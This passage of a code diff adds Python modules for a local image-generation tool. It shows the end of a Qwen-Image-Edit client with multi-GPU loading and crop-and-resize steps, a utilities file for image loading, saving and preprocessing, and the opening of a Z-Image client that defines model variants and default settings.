logger.info(f"Main GPU cuda:{main_idx}: {main_vram:.1f} GB VRAM")
|
| 296 |
+
|
| 297 |
+
start_time = time.time()
|
| 298 |
+
loaded = False
|
| 299 |
+
|
| 300 |
+
# Strategy 1: Pinned 2-GPU (always try first if main GPU is large enough)
|
| 301 |
+
if not loaded and main_vram >= self.MAIN_GPU_MIN_VRAM_GB:
|
| 302 |
+
encoder_idx = None
|
| 303 |
+
if self.encoder_device:
|
| 304 |
+
encoder_idx = self._parse_device_idx(self.encoder_device)
|
| 305 |
+
enc_vram = self._get_gpu_vram_gb(encoder_idx)
|
| 306 |
+
if enc_vram < self.ENCODER_GPU_MIN_VRAM_GB:
|
| 307 |
+
logger.warning(
|
| 308 |
+
f"Specified encoder device cuda:{encoder_idx} has "
|
| 309 |
+
f"{enc_vram:.1f} GB, need {self.ENCODER_GPU_MIN_VRAM_GB} GB. "
|
| 310 |
+
f"Falling back to auto-detect.")
|
| 311 |
+
encoder_idx = None
|
| 312 |
+
|
| 313 |
+
if encoder_idx is None:
|
| 314 |
+
encoder_idx = self._find_encoder_gpu(main_idx)
|
| 315 |
+
|
| 316 |
+
if encoder_idx is not None:
|
| 317 |
+
self._load_pinned_multi_gpu(model_id, main_idx, encoder_idx)
|
| 318 |
+
loaded = True
|
| 319 |
+
|
| 320 |
+
# Strategy 2: Balanced single-GPU
|
| 321 |
+
if not loaded and main_vram >= self.BALANCED_VRAM_THRESHOLD_GB:
|
| 322 |
+
max_mem_gb = int(main_vram - 4)
|
| 323 |
+
self.pipe = QwenImageEditPipeline.from_pretrained(
|
| 324 |
+
model_id, torch_dtype=self.dtype,
|
| 325 |
+
device_map="balanced",
|
| 326 |
+
max_memory={main_idx: f"{max_mem_gb}GiB"},
|
| 327 |
+
)
|
| 328 |
+
self._loading_strategy = "balanced_single"
|
| 329 |
+
logger.info(f"Loaded with device_map='balanced', max_memory={max_mem_gb}GiB")
|
| 330 |
+
loaded = True
|
| 331 |
+
|
| 332 |
+
# Strategy 3: CPU offload (only if allowed)
|
| 333 |
+
if not loaded and self.enable_cpu_offload:
|
| 334 |
+
self.pipe = QwenImageEditPipeline.from_pretrained(
|
| 335 |
+
model_id, torch_dtype=self.dtype)
|
| 336 |
+
self.pipe.enable_model_cpu_offload()
|
| 337 |
+
self._loading_strategy = "cpu_offload"
|
| 338 |
+
logger.info("Loaded with enable_model_cpu_offload()")
|
| 339 |
+
loaded = True
|
| 340 |
+
|
| 341 |
+
# Strategy 4: Direct load (last resort, may OOM)
|
| 342 |
+
if not loaded:
|
| 343 |
+
self.pipe = QwenImageEditPipeline.from_pretrained(
|
| 344 |
+
model_id, torch_dtype=self.dtype)
|
| 345 |
+
self.pipe.to(self.device)
|
| 346 |
+
self._loading_strategy = "direct"
|
| 347 |
+
logger.info(f"Loaded directly to {self.device}")
|
| 348 |
+
|
| 349 |
+
self.pipe.set_progress_bar_config(disable=None)
|
| 350 |
+
|
| 351 |
+
load_time = time.time() - start_time
|
| 352 |
+
logger.info(f"Qwen-Image-Edit loaded in {load_time:.1f}s (strategy: {self._loading_strategy})")
|
| 353 |
+
|
| 354 |
+
self._loaded = True
|
| 355 |
+
return True
|
| 356 |
+
|
| 357 |
+
except Exception as e:
|
| 358 |
+
logger.error(f"Failed to load Qwen-Image-Edit: {e}", exc_info=True)
|
| 359 |
+
return False
|
| 360 |
+
|
| 361 |
+
def unload_model(self):
|
| 362 |
+
"""Unload model from memory."""
|
| 363 |
+
if self.pipe is not None:
|
| 364 |
+
del self.pipe
|
| 365 |
+
self.pipe = None
|
| 366 |
+
self._loaded = False
|
| 367 |
+
|
| 368 |
+
if torch.cuda.is_available():
|
| 369 |
+
torch.cuda.empty_cache()
|
| 370 |
+
|
| 371 |
+
logger.info("Qwen-Image-Edit-2511 unloaded")
|
| 372 |
+
|
| 373 |
+
def generate(
|
| 374 |
+
self,
|
| 375 |
+
request: GenerationRequest,
|
| 376 |
+
num_inference_steps: int = 40,
|
| 377 |
+
guidance_scale: float = 1.0,
|
| 378 |
+
true_cfg_scale: float = 4.0
|
| 379 |
+
) -> GenerationResult:
|
| 380 |
+
"""
|
| 381 |
+
Generate/edit image using Qwen-Image-Edit-2511.
|
| 382 |
+
|
| 383 |
+
Args:
|
| 384 |
+
request: GenerationRequest object
|
| 385 |
+
num_inference_steps: Number of denoising steps
|
| 386 |
+
guidance_scale: Classifier-free guidance scale
|
| 387 |
+
true_cfg_scale: True CFG scale for better control
|
| 388 |
+
|
| 389 |
+
Returns:
|
| 390 |
+
GenerationResult object
|
| 391 |
+
"""
|
| 392 |
+
if not self._loaded:
|
| 393 |
+
if not self.load_model():
|
| 394 |
+
return GenerationResult.error_result("Failed to load Qwen-Image-Edit-2511 model")
|
| 395 |
+
|
| 396 |
+
try:
|
| 397 |
+
start_time = time.time()
|
| 398 |
+
|
| 399 |
+
# Target dimensions for post-processing crop+resize
|
| 400 |
+
target_w, target_h = self._get_dimensions(request.aspect_ratio)
|
| 401 |
+
|
| 402 |
+
# Build input images list
|
| 403 |
+
input_images = []
|
| 404 |
+
if request.has_input_images:
|
| 405 |
+
input_images = [img for img in request.input_images if img is not None]
|
| 406 |
+
|
| 407 |
+
# Always generate at the proven native resolution (1104x1472).
|
| 408 |
+
# Other resolutions cause VAE tiling artifacts.
|
| 409 |
+
native_w, native_h = self.NATIVE_RESOLUTION
|
| 410 |
+
gen_kwargs = {
|
| 411 |
+
"prompt": request.prompt,
|
| 412 |
+
"negative_prompt": request.negative_prompt or " ",
|
| 413 |
+
"height": native_h,
|
| 414 |
+
"width": native_w,
|
| 415 |
+
"num_inference_steps": num_inference_steps,
|
| 416 |
+
"guidance_scale": guidance_scale,
|
| 417 |
+
"true_cfg_scale": true_cfg_scale,
|
| 418 |
+
"num_images_per_prompt": 1,
|
| 419 |
+
"generator": torch.manual_seed(42),
|
| 420 |
+
}
|
| 421 |
+
|
| 422 |
+
# Qwen-Image-Edit is a single-image editor: use only the first image.
|
| 423 |
+
# The character service passes multiple references (face, body, costume)
|
| 424 |
+
# but the costume/view info is already encoded in the text prompt.
|
| 425 |
+
if input_images:
|
| 426 |
+
gen_kwargs["image"] = input_images[0]
|
| 427 |
+
|
| 428 |
+
logger.info(f"Generating with Qwen-Image-Edit: {request.prompt[:80]}...")
|
| 429 |
+
logger.info(f"Input images: {len(input_images)} (using first)")
|
| 430 |
+
logger.info(f"Native: {native_w}x{native_h}, target: {target_w}x{target_h}")
|
| 431 |
+
|
| 432 |
+
# Generate at proven native resolution
|
| 433 |
+
with torch.inference_mode():
|
| 434 |
+
output = self.pipe(**gen_kwargs)
|
| 435 |
+
image = output.images[0]
|
| 436 |
+
|
| 437 |
+
generation_time = time.time() - start_time
|
| 438 |
+
logger.info(f"Generated in {generation_time:.2f}s: {image.size}")
|
| 439 |
+
|
| 440 |
+
# Crop + resize to requested aspect ratio
|
| 441 |
+
image = self._crop_and_resize(image, target_w, target_h)
|
| 442 |
+
logger.info(f"Post-processed to: {image.size}")
|
| 443 |
+
|
| 444 |
+
return GenerationResult.success_result(
|
| 445 |
+
image=image,
|
| 446 |
+
message=f"Generated with Qwen-Image-Edit in {generation_time:.2f}s",
|
| 447 |
+
generation_time=generation_time
|
| 448 |
+
)
|
| 449 |
+
|
| 450 |
+
except Exception as e:
|
| 451 |
+
logger.error(f"Qwen-Image-Edit generation failed: {e}", exc_info=True)
|
| 452 |
+
return GenerationResult.error_result(f"Qwen-Image-Edit error: {str(e)}")
|
| 453 |
+
|
| 454 |
+
@staticmethod
|
| 455 |
+
def _crop_and_resize(image: Image.Image, target_w: int, target_h: int) -> Image.Image:
|
| 456 |
+
"""Crop image to target aspect ratio, then resize to target dimensions.
|
| 457 |
+
|
| 458 |
+
Centers the crop on the image so equal amounts are trimmed from
|
| 459 |
+
each side. Uses LANCZOS for high-quality downscaling.
|
| 460 |
+
"""
|
| 461 |
+
src_w, src_h = image.size
|
| 462 |
+
target_ratio = target_w / target_h
|
| 463 |
+
src_ratio = src_w / src_h
|
| 464 |
+
|
| 465 |
+
if abs(target_ratio - src_ratio) < 0.01:
|
| 466 |
+
# Already the right aspect ratio, just resize
|
| 467 |
+
return image.resize((target_w, target_h), Image.LANCZOS)
|
| 468 |
+
|
| 469 |
+
if target_ratio < src_ratio:
|
| 470 |
+
# Target is taller/narrower than source → crop sides
|
| 471 |
+
crop_w = int(src_h * target_ratio)
|
| 472 |
+
offset = (src_w - crop_w) // 2
|
| 473 |
+
image = image.crop((offset, 0, offset + crop_w, src_h))
|
| 474 |
+
else:
|
| 475 |
+
# Target is wider than source → crop top/bottom
|
| 476 |
+
crop_h = int(src_w / target_ratio)
|
| 477 |
+
offset = (src_h - crop_h) // 2
|
| 478 |
+
image = image.crop((0, offset, src_w, offset + crop_h))
|
| 479 |
+
|
| 480 |
+
return image.resize((target_w, target_h), Image.LANCZOS)
|
| 481 |
+
|
| 482 |
+
def _get_dimensions(self, aspect_ratio: str) -> tuple:
|
| 483 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 484 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 485 |
+
return self.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
| 486 |
+
|
| 487 |
+
def is_healthy(self) -> bool:
|
| 488 |
+
"""Check if model is loaded and ready."""
|
| 489 |
+
return self._loaded and self.pipe is not None
|
| 490 |
+
|
| 491 |
+
@classmethod
|
| 492 |
+
def get_dimensions(cls, aspect_ratio: str) -> tuple:
|
| 493 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 494 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 495 |
+
return cls.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
src/utils.py
ADDED
|
@@ -0,0 +1,247 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Utility Functions
|
| 3 |
+
=================
|
| 4 |
+
|
| 5 |
+
Helper functions for image processing and file operations.
|
| 6 |
+
"""
|
| 7 |
+
|
| 8 |
+
import re
|
| 9 |
+
import logging
|
| 10 |
+
from pathlib import Path
|
| 11 |
+
from typing import Optional, Union
|
| 12 |
+
from datetime import datetime
|
| 13 |
+
from PIL import Image
|
| 14 |
+
|
| 15 |
+
|
| 16 |
+
logger = logging.getLogger(__name__)
|
| 17 |
+
|
| 18 |
+
|
| 19 |
+
def ensure_pil_image(
|
| 20 |
+
obj: Union[Image.Image, str, Path, None],
|
| 21 |
+
context: str = ""
|
| 22 |
+
) -> Image.Image:
|
| 23 |
+
"""
|
| 24 |
+
Ensure object is a PIL Image.
|
| 25 |
+
|
| 26 |
+
Args:
|
| 27 |
+
obj: Image, path, or None
|
| 28 |
+
context: Context for error messages
|
| 29 |
+
|
| 30 |
+
Returns:
|
| 31 |
+
PIL Image
|
| 32 |
+
|
| 33 |
+
Raises:
|
| 34 |
+
ValueError: If object cannot be converted to Image
|
| 35 |
+
"""
|
| 36 |
+
if obj is None:
|
| 37 |
+
raise ValueError(f"[{context}] Image is None")
|
| 38 |
+
|
| 39 |
+
if isinstance(obj, Image.Image):
|
| 40 |
+
return obj
|
| 41 |
+
|
| 42 |
+
if isinstance(obj, (str, Path)):
|
| 43 |
+
try:
|
| 44 |
+
return Image.open(obj)
|
| 45 |
+
except Exception as e:
|
| 46 |
+
raise ValueError(f"[{context}] Failed to load image from path: {e}")
|
| 47 |
+
|
| 48 |
+
raise ValueError(f"[{context}] Unsupported image type: {type(obj)}")
|
| 49 |
+
|
| 50 |
+
|
| 51 |
+
def sanitize_filename(name: str) -> str:
|
| 52 |
+
"""
|
| 53 |
+
Sanitize string for use as filename.
|
| 54 |
+
|
| 55 |
+
Args:
|
| 56 |
+
name: Original name
|
| 57 |
+
|
| 58 |
+
Returns:
|
| 59 |
+
Safe filename string
|
| 60 |
+
"""
|
| 61 |
+
# Replace problematic characters
|
| 62 |
+
safe_name = re.sub(r'[<>:"/\\|?*]', '_', name)
|
| 63 |
+
# Remove leading/trailing spaces and dots
|
| 64 |
+
safe_name = safe_name.strip('. ')
|
| 65 |
+
# Limit length
|
| 66 |
+
if len(safe_name) > 100:
|
| 67 |
+
safe_name = safe_name[:100]
|
| 68 |
+
return safe_name or "unnamed"
|
| 69 |
+
|
| 70 |
+
|
| 71 |
+
def save_image(
|
| 72 |
+
image: Image.Image,
|
| 73 |
+
directory: Path,
|
| 74 |
+
base_name: str,
|
| 75 |
+
format: str = "PNG"
|
| 76 |
+
) -> Path:
|
| 77 |
+
"""
|
| 78 |
+
Save image to directory.
|
| 79 |
+
|
| 80 |
+
Args:
|
| 81 |
+
image: PIL Image to save
|
| 82 |
+
directory: Output directory
|
| 83 |
+
base_name: Base filename (without extension)
|
| 84 |
+
format: Image format
|
| 85 |
+
|
| 86 |
+
Returns:
|
| 87 |
+
Path to saved file
|
| 88 |
+
"""
|
| 89 |
+
directory = Path(directory)
|
| 90 |
+
directory.mkdir(parents=True, exist_ok=True)
|
| 91 |
+
|
| 92 |
+
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
|
| 93 |
+
safe_name = sanitize_filename(base_name)
|
| 94 |
+
ext = format.lower()
|
| 95 |
+
|
| 96 |
+
filename = f"{safe_name}_{timestamp}.{ext}"
|
| 97 |
+
filepath = directory / filename
|
| 98 |
+
|
| 99 |
+
image.save(filepath, format=format)
|
| 100 |
+
logger.info(f"Saved: {filepath}")
|
| 101 |
+
|
| 102 |
+
return filepath
|
| 103 |
+
|
| 104 |
+
|
| 105 |
+
def resize_for_display(
|
| 106 |
+
image: Image.Image,
|
| 107 |
+
max_size: int = 1024
|
| 108 |
+
) -> Image.Image:
|
| 109 |
+
"""
|
| 110 |
+
Resize image for display while maintaining aspect ratio.
|
| 111 |
+
|
| 112 |
+
Args:
|
| 113 |
+
image: PIL Image
|
| 114 |
+
max_size: Maximum dimension
|
| 115 |
+
|
| 116 |
+
Returns:
|
| 117 |
+
Resized image
|
| 118 |
+
"""
|
| 119 |
+
width, height = image.size
|
| 120 |
+
|
| 121 |
+
if width <= max_size and height <= max_size:
|
| 122 |
+
return image
|
| 123 |
+
|
| 124 |
+
if width > height:
|
| 125 |
+
new_width = max_size
|
| 126 |
+
new_height = int(height * max_size / width)
|
| 127 |
+
else:
|
| 128 |
+
new_height = max_size
|
| 129 |
+
new_width = int(width * max_size / height)
|
| 130 |
+
|
| 131 |
+
return image.resize((new_width, new_height), Image.Resampling.LANCZOS)
|
| 132 |
+
|
| 133 |
+
|
| 134 |
+
def get_image_info(image: Image.Image) -> str:
|
| 135 |
+
"""Get human-readable image info string."""
|
| 136 |
+
return f"{image.size[0]}x{image.size[1]} {image.mode}"
|
| 137 |
+
|
| 138 |
+
|
| 139 |
+
def preprocess_input_image(
|
| 140 |
+
image: Image.Image,
|
| 141 |
+
max_size: int = 1024,
|
| 142 |
+
target_size: tuple = None,
|
| 143 |
+
ensure_rgb: bool = True
|
| 144 |
+
) -> Image.Image:
|
| 145 |
+
"""
|
| 146 |
+
Preprocess input image for model consumption.
|
| 147 |
+
|
| 148 |
+
Handles various formats (JFIF, TIFF, WebP, etc.) by converting to RGB PNG-compatible format.
|
| 149 |
+
|
| 150 |
+
Args:
|
| 151 |
+
image: PIL Image to preprocess
|
| 152 |
+
max_size: Maximum dimension (used if target_size not specified)
|
| 153 |
+
target_size: Specific (width, height) to resize to
|
| 154 |
+
ensure_rgb: Convert to RGB mode
|
| 155 |
+
|
| 156 |
+
Returns:
|
| 157 |
+
Preprocessed PIL Image in RGB format
|
| 158 |
+
"""
|
| 159 |
+
# Ensure we have a copy to avoid modifying original
|
| 160 |
+
img = image.copy()
|
| 161 |
+
|
| 162 |
+
# Force re-encode as PNG-compatible by saving to memory and reloading
|
| 163 |
+
# This handles weird formats like JFIF, TIFF, etc.
|
| 164 |
+
import io
|
| 165 |
+
buf = io.BytesIO()
|
| 166 |
+
|
| 167 |
+
# Convert to RGB first if needed
|
| 168 |
+
if img.mode not in ('RGB', 'RGBA'):
|
| 169 |
+
img = img.convert('RGB')
|
| 170 |
+
|
| 171 |
+
# Save as PNG to buffer and reload - this normalizes the format
|
| 172 |
+
img.save(buf, format='PNG')
|
| 173 |
+
buf.seek(0)
|
| 174 |
+
img = Image.open(buf)
|
| 175 |
+
img.load() # Force load into memory
|
| 176 |
+
|
| 177 |
+
# Convert to RGB if needed (handle RGBA)
|
| 178 |
+
if ensure_rgb and img.mode != 'RGB':
|
| 179 |
+
if img.mode == 'RGBA':
|
| 180 |
+
# Handle transparency by compositing on white background
|
| 181 |
+
background = Image.new('RGB', img.size, (255, 255, 255))
|
| 182 |
+
background.paste(img, mask=img.split()[3])
|
| 183 |
+
img = background
|
| 184 |
+
else:
|
| 185 |
+
img = img.convert('RGB')
|
| 186 |
+
|
| 187 |
+
# Resize to target size or max_size
|
| 188 |
+
if target_size:
|
| 189 |
+
img = img.resize(target_size, Image.Resampling.LANCZOS)
|
| 190 |
+
else:
|
| 191 |
+
width, height = img.size
|
| 192 |
+
if width > max_size or height > max_size:
|
| 193 |
+
if width > height:
|
| 194 |
+
new_width = max_size
|
| 195 |
+
new_height = int(height * max_size / width)
|
| 196 |
+
else:
|
| 197 |
+
new_height = max_size
|
| 198 |
+
new_width = int(width * max_size / height)
|
| 199 |
+
img = img.resize((new_width, new_height), Image.Resampling.LANCZOS)
|
| 200 |
+
|
| 201 |
+
return img
|
| 202 |
+
|
| 203 |
+
|
| 204 |
+
def preprocess_images_for_backend(
|
| 205 |
+
images: list,
|
| 206 |
+
backend_type: str,
|
| 207 |
+
aspect_ratio: str = "1:1"
|
| 208 |
+
) -> list:
|
| 209 |
+
"""
|
| 210 |
+
Preprocess a list of images for a specific backend.
|
| 211 |
+
|
| 212 |
+
Args:
|
| 213 |
+
images: List of PIL Images
|
| 214 |
+
backend_type: Backend type string (e.g., 'flux_klein', 'qwen_comfyui')
|
| 215 |
+
aspect_ratio: Target aspect ratio
|
| 216 |
+
|
| 217 |
+
Returns:
|
| 218 |
+
List of preprocessed PIL Images
|
| 219 |
+
"""
|
| 220 |
+
if not images:
|
| 221 |
+
return images
|
| 222 |
+
|
| 223 |
+
# Backend-specific settings
|
| 224 |
+
# FLUX models work best with smaller input images (512-768px)
|
| 225 |
+
backend_configs = {
|
| 226 |
+
'flux_klein': {'max_size': 768}, # 4B - faster with smaller inputs
|
| 227 |
+
'flux_klein_9b_fp8': {'max_size': 768}, # 9B - same, quality comes from model not input size
|
| 228 |
+
'qwen_image_edit': {'max_size': 1024},
|
| 229 |
+
'qwen_comfyui': {'max_size': 1024},
|
| 230 |
+
'zimage_turbo': {'max_size': 768},
|
| 231 |
+
'zimage_base': {'max_size': 768},
|
| 232 |
+
'longcat_edit': {'max_size': 768},
|
| 233 |
+
'gemini_flash': {'max_size': 1024}, # Gemini handles larger but 1024 is fine
|
| 234 |
+
'gemini_pro': {'max_size': 1024},
|
| 235 |
+
}
|
| 236 |
+
|
| 237 |
+
config = backend_configs.get(backend_type, {'max_size': 1024})
|
| 238 |
+
max_size = config['max_size']
|
| 239 |
+
|
| 240 |
+
processed = []
|
| 241 |
+
for img in images:
|
| 242 |
+
if img is not None:
|
| 243 |
+
processed.append(preprocess_input_image(img, max_size=max_size))
|
| 244 |
+
else:
|
| 245 |
+
processed.append(None)
|
| 246 |
+
|
| 247 |
+
return processed
|
src/zimage_client.py
ADDED
|
@@ -0,0 +1,351 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Z-Image Client
|
| 3 |
+
==============
|
| 4 |
+
|
| 5 |
+
Client for Z-Image (Tongyi-MAI) local image generation.
|
| 6 |
+
Supports text-to-image and image-to-image editing.
|
| 7 |
+
|
| 8 |
+
Z-Image is a 6B parameter model that achieves state-of-the-art quality
|
| 9 |
+
with only 8-9 inference steps, fitting in 16GB VRAM.
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import logging
|
| 13 |
+
import time
|
| 14 |
+
from typing import Optional, List
|
| 15 |
+
from PIL import Image
|
| 16 |
+
|
| 17 |
+
import torch
|
| 18 |
+
|
| 19 |
+
from .models import GenerationRequest, GenerationResult
|
| 20 |
+
|
| 21 |
+
|
| 22 |
+
logger = logging.getLogger(__name__)
|
| 23 |
+
|
| 24 |
+
|
| 25 |
+
class ZImageClient:
|
| 26 |
+
"""
|
| 27 |
+
Client for Z-Image models from Tongyi-MAI.
|
| 28 |
+
|
| 29 |
+
Supports:
|
| 30 |
+
- Text-to-image generation (ZImagePipeline)
|
| 31 |
+
- Image-to-image editing (ZImageImg2ImgPipeline)
|
| 32 |
+
- Multiple model variants (Turbo, Base, Edit, Omni)
|
| 33 |
+
"""
|
| 34 |
+
|
| 35 |
+
# Model variants
|
| 36 |
+
MODELS = {
|
| 37 |
+
# Turbo - Fast, distilled, 8-9 steps, fits 16GB VRAM
|
| 38 |
+
"turbo": "Tongyi-MAI/Z-Image-Turbo",
|
| 39 |
+
# Base - Quality-focused, more steps
|
| 40 |
+
"base": "Tongyi-MAI/Z-Image",
|
| 41 |
+
# Edit - Fine-tuned for instruction-following image editing
|
| 42 |
+
"edit": "Tongyi-MAI/Z-Image-Edit",
|
| 43 |
+
# Omni - Versatile, supports both generation and editing
|
| 44 |
+
"omni": "Tongyi-MAI/Z-Image-Omni-Base",
|
| 45 |
+
}
|
| 46 |
+
|
| 47 |
+
# Aspect ratio to dimensions mapping
|
| 48 |
+
# Z-Image supports 512x512 to 2048x2048
|
| 49 |
+
ASPECT_RATIOS = {
|
| 50 |
+
"1:1": (1024, 1024),
|
| 51 |
+
"16:9": (1344, 768),
|
| 52 |
+
"9:16": (768, 1344),
|
| 53 |
+
"21:9": (1536, 640), # Cinematic ultra-wide
|
| 54 |
+
"3:2": (1248, 832),
|
| 55 |
+
"2:3": (832, 1248),
|
| 56 |
+
"3:4": (896, 1152),
|
| 57 |
+
"4:3": (1152, 896),
|
| 58 |
+
"4:5": (896, 1120),
|
| 59 |
+
"5:4": (1120, 896),
|
| 60 |
+
}
|
| 61 |
+
|
| 62 |
+
# Default settings for each model variant
|
| 63 |
+
MODEL_DEFAULTS = {
|
| 64 |
+
"turbo": {"steps": 9, "guidance": 0.0}, # Fast, no CFG needed
|
| 65 |
+
"base": {"steps": 50, "guidance": 4.0}, # Quality-focused
|
| 66 |
+
"edit": {"steps": 28, "guidance": 3.5}, # Editing
|
| 67 |
+
"omni": {"steps": 28, "guidance": 3.5}, # Versatile
|
| 68 |
+
}
|
| 69 |
+
|
| 70 |
+
def __init__(
|
| 71 |
+
self,
|
| 72 |
+
model_variant: str = "turbo",
|
| 73 |
+
device: str = "cuda",
|
| 74 |
+
